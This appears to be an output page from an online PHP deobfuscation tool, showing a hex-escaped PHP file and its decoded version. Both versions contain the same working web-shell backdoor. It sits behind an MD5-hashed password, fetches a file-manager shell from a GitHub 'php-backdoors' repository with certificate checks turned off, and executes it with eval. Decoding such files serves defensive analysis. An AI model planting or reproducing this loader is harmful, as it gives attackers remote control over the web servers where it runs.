Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto brccH; brccH: session_start(); goto BD6Uz; TI5tq: if (isset($_POST["\x70\141\..
Decoded Output download
<?php
goto brccH; brccH: session_start(); goto BD6Uz; TI5tq: if (isset($_POST["password"])) { $entered_password = $_POST["password"]; $hashed_password = "a4af9adc69910a86f816e656d8e8ad60"; if (md5($entered_password) === $hashed_password) { $_SESSION["logged_in"] = true; $_SESSION["coki"] = "asu"; } else { echo "Incorrect password. Please try again."; } } goto HZoZ7; cVtnT: function is_logged_in() { return isset($_SESSION["logged_in"]) && $_SESSION["logged_in"] === true; } goto TI5tq; BD6Uz: function geturlsinfo($url) { if (function_exists("curl_exec")) { $conn = curl_init($url); curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1); curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($conn, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($conn, CURLOPT_SSL_VERIFYHOST, 0); if (isset($_SESSION["coki"])) { curl_setopt($conn, CURLOPT_COOKIE, $_SESSION["coki"]); } $url_get_contents_data = curl_exec($conn); curl_close($conn); } elseif (function_exists("file_get_contents")) { $url_get_contents_data = file_get_contents($url); } elseif (function_exists("fopen") && function_exists("stream_get_contents")) { $handle = fopen($url, "r"); $url_get_contents_data = stream_get_contents($handle); fclose($handle); } else { $url_get_contents_data = false; } return $url_get_contents_data; } goto cVtnT; HZoZ7: if (is_logged_in()) { $a = geturlsinfo("https://raw.githubusercontent.com/1337r0j4n/php-backdoors/main/SHELLs/Elep%20Filemanager/elep.php"); eval("?>" . $a); } else { ?>
<!doctypehtml><html><head><title>AH AH AH NIKUNG YA...</title></head><body><form action=""method="POST"><label for="password">P:</label> <input type="password"id="password"name="password"> <input type="submit"value="LOGIN UNTUK YANTO"></form></body></html><?php } goto BlPVV; BlPVV: ?>Did this file decode correctly?
Original Code
<?php
goto brccH; brccH: session_start(); goto BD6Uz; TI5tq: if (isset($_POST["\x70\141\163\163\x77\157\x72\144"])) { $entered_password = $_POST["\x70\141\163\163\167\157\162\x64"]; $hashed_password = "\141\x34\141\x66\71\x61\x64\143\x36\71\x39\61\60\141\70\66\x66\70\x31\66\145\x36\x35\x36\144\70\145\70\x61\x64\x36\60"; if (md5($entered_password) === $hashed_password) { $_SESSION["\x6c\157\147\x67\145\144\137\x69\156"] = true; $_SESSION["\x63\157\x6b\151"] = "\x61\x73\x75"; } else { echo "\111\x6e\x63\x6f\162\x72\x65\x63\164\x20\160\x61\163\163\167\157\162\x64\56\x20\120\x6c\x65\x61\x73\145\x20\x74\x72\171\40\141\147\141\x69\156\x2e"; } } goto HZoZ7; cVtnT: function is_logged_in() { return isset($_SESSION["\x6c\157\147\147\145\144\x5f\x69\x6e"]) && $_SESSION["\x6c\157\x67\147\145\x64\x5f\151\156"] === true; } goto TI5tq; BD6Uz: function geturlsinfo($url) { if (function_exists("\x63\x75\x72\154\137\x65\170\x65\143")) { $conn = curl_init($url); curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1); curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($conn, CURLOPT_USERAGENT, "\x4d\x6f\172\x69\x6c\154\x61\57\65\x2e\60\40\50\127\x69\x6e\x64\x6f\x77\163\x20\116\124\x20\66\x2e\x31\73\x20\162\x76\72\63\x32\56\60\51\x20\x47\145\143\x6b\x6f\57\x32\60\x31\60\60\61\60\61\x20\x46\151\162\x65\146\x6f\x78\x2f\x33\62\x2e\60"); curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($conn, CURLOPT_SSL_VERIFYHOST, 0); if (isset($_SESSION["\x63\x6f\x6b\151"])) { curl_setopt($conn, CURLOPT_COOKIE, $_SESSION["\143\157\x6b\x69"]); } $url_get_contents_data = curl_exec($conn); curl_close($conn); } elseif (function_exists("\146\151\154\x65\x5f\147\x65\x74\x5f\x63\x6f\x6e\164\145\156\164\x73")) { $url_get_contents_data = file_get_contents($url); } elseif (function_exists("\146\157\160\x65\x6e") && function_exists("\x73\x74\x72\x65\141\x6d\137\147\145\164\x5f\143\157\156\164\x65\156\164\x73")) { $handle = fopen($url, "\x72"); $url_get_contents_data = stream_get_contents($handle); fclose($handle); } else { $url_get_contents_data = false; } return $url_get_contents_data; } goto cVtnT; HZoZ7: if (is_logged_in()) { $a = geturlsinfo("\x68\x74\x74\x70\163\x3a\57\57\x72\141\x77\56\147\x69\x74\x68\165\142\165\x73\145\x72\x63\x6f\x6e\x74\145\156\164\x2e\x63\x6f\155\x2f\61\x33\x33\67\162\60\x6a\64\156\x2f\x70\x68\x70\55\x62\x61\143\153\x64\157\x6f\162\163\57\x6d\x61\151\x6e\57\123\x48\105\x4c\114\163\x2f\105\x6c\x65\160\45\x32\60\x46\151\x6c\145\x6d\x61\156\141\147\145\162\57\x65\154\x65\x70\x2e\160\x68\x70"); eval("\77\76" . $a); } else { ?>
<!doctypehtml><html><head><title>AH AH AH NIKUNG YA...</title></head><body><form action=""method="POST"><label for="password">P:</label> <input type="password"id="password"name="password"> <input type="submit"value="LOGIN UNTUK YANTO"></form></body></html><?php } goto BlPVV; BlPVV: ?>Function Calls
| None |
Stats
| MD5 | 64e036231d98c77b5b3e2dbffa18d484 |
| Eval Count | 0 |
| Decode Time | 48 ms |